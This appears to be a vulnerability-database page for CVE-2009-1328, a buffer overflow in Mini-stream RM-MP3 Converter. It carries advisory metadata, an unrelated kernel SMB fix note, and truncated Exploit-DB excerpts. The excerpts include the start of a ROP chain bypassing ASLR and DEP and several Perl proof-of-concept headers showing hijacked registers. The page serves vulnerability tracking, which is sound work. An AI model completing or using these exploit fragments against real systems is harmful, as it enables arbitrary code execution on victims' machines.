CVE-2009-1328
published 2009-04-17
CVE-2009-1328: Stack-based buffer overflow in Mini-stream RM-MP3 Converter 3.0.0.7 allows remote attackers to execute arbitrary code via a long URI in a playlist (.m3u) file.
Priority P344 · critical · 9.3 CVSS 2.0
AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 7.13% (93.5th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mini-stream | rm-mp3_converter | — | — |
Kernel
smb: client: fix OOB in smbCalcSize()
kernel_security·2023-12-15·CVSS 7.1
CVE-2023-6606 [HIGH] smb: client: fix OOB in smbCalcSize()
smb: client: fix OOB in smbCalcSize()
Validate @smb->WordCount to avoid reading off the end of @smb and thus
causing the following KASAN splat:
BUG: KASAN: slab-out-of-bounds in smbCalcSize+0x32/0x40 [cifs]
Read of size 2 at addr ffff88801c024ec5 by task cifsd/1328
CPU: 1 PID: 1328 Comm: cifsd Not tainted 6.7.0-rc5 #9
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS
rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014
Call Trace:
dump_stack_lvl+0x4a/0x80
print_report+0xcf/0x650
? srso_alias_return_thunk+0x5/0xfbef5
? srso_alias_return_thunk+0x5/0xfbef5
? __phys_addr+0x46/0x90
kasan_report+0xd8/0x110
? smbCalcSize+0x32/0x40 [cifs]
? smbCalcSize+0x32/0x40 [cifs]
kasan_check_range+0x105/0x1b0
smbCalcSize+0x32/0x40 [cifs]
checkSMB+0x162/0x370 [cifs]
? __pfx_checkSMB+0x10/0x10 [ci
GHSA
GHSA-v5wv-mgcq-2c5w: Stack-based buffer overflow in Mini-stream RM-MP3 Converter 3
ghsa_unreviewed·2022-05-02
CVE-2009-1328 [HIGH] CWE-119 GHSA-v5wv-mgcq-2c5w: Stack-based buffer overflow in Mini-stream RM-MP3 Converter 3
Stack-based buffer overflow in Mini-stream RM-MP3 Converter 3.0.0.7 allows remote attackers to execute arbitrary code via a long URI in a playlist (.m3u) file.
No detection rules found.
Exploit-DB
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Local Buffer Overflow (ASLR + DEP Bypass)
exploitdb·2012-07-27·CVSS 9.3
CVE-2009-1328 [CRITICAL] Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Local Buffer Overflow (ASLR + DEP Bypass)
---
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 local buffer overflow (\w ASLR and DEP bypass)
# Date: 26 July 2012
# Exploit Author: Gianni Gnesa
# Vendor Homepage: http://mini-stream.net/
# Software Link: http://mini-stream.net/rm-to-mp3-converter/download
# Version: 3.1.2.1.2010.03.30
# Tested on: Windows 7 SP1 (VMware)
# References: CVE-2009-1328, BID 34494
from struct import pack
fname = "rop.m3u"
hdr = "http://."
junk1 = "A" * 17416 # junk
rop = [
0x10041720, # RETN [MSRMfilter03.dll]
0x41414141, # Compensate
#### Save ESP into ESI
# EAX=EBP
0x1001a503, # XOR EAX,EAX / RETN [MSRMfilter03.dll]
0x10051ff5, # ADD EAX,EBP / RETN [MSRMfilter03.dll]
# ESI=EAX
0x1005bb8e,
Exploit-DB
WM Downloader - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 WM Downloader - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# *************************************************************
# * WM Downloader (.M3U File) Local Stack Overflow POC *
# *************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/WMDownloader.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D00000
#EBX 00333D78 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F739C
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2FCE0
#EDI 00006619
#EIP 41414
Exploit-DB
RM Downloader - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 RM Downloader - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# *********************************************************
# * RM Downloader (.M3U File) Local Stack Overflow POC *
# *********************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/RMDownloader.exe
#
#
# Olly registers
#EAX 00000001
#ECX 7C92056D ntdll.7C92056D
#EDX 00A20000
#EBX 00104A54
#ESP 000FFE3C
#EBP 00333E98 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESI 77C2FCE0 MSVCRT.77C2FCE0
#EDI 0000660D
#EI
Exploit-DB
Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# *************************************************************
# * Mini-stream Ripper (.M3U File) Local Stack Overflow POC *
# *************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/Mini-streamRipper.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333D60 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F70CC ASCII "AAAA"
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2F
Exploit-DB
Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow
exploitdb·2009-04-13
CVE-2009-1328 Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow
---
#!/usr/bin/perl
# Mini-stream RM-MP3 Converter Version 3.0.0.7 .m3u Universal Stack Overflow Exploit
# Discovered By Cyber-Zone
# Exploited By Stack
my $Header = "#EXTM3U\n";
my $shellcode =
Exploit-DB
Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# ************************************************************************
# * Mini-stream RM-MP3 Converter (.M3U File) Local Stack Overflow POC *
# ************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/Mini-streamRM-MP3Converter.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D20000
#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000
Exploit-DB
ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# ************************************************************************
# * ASX to MP3 Converter (.M3U File) Local Stack Overflow POC *
# ************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/ASXtoMP3Converter.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F6C90
#EBP 000FBFB4
#ESI 77C2FCE0
No writeups or analysis indexed.
http://secunia.com/advisories/34653
http://www.securityfocus.com/bid/34494
https://exchange.xforce.ibmcloud.com/vulnerabilities/49841
https://www.exploit-db.com/exploits/8405
https://www.exploit-db.com/exploits/8413
Published 2009-04-17